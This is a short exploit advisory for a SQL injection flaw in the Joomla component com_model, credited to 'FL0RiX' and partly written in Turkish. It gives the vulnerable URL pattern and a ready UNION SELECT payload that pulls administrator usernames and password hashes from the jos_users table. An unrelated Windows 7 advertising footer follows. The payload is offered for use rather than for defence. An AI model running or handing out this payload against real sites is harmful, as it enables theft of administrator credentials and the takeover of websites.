######################################################################## # Joomla Component com_model SQL Injection Vulnerability ######################################################################## # Author :FL0RiX # #Greez: All Tahkikat-ul Ahlak Family # # Name : com_model # # Bug Type : SQL Injection # # Infection : Admin login bilgileri alinabilir. # # Demo Vuln : # # site.com/index.php?option=com_model&id=[EXPLOIT] # # EXPLOIT : null+and+1=0+union+select+1,concat(username,0x3a,password),3,4+from+jos_users&view=details&Itemid=29 ############################################################################# _________________________________________________________________ Yeni Windows 7: Size en uygun bilgisayarę bulun. Daha fazla bilgi edinin. http://windows.microsoft.com/shop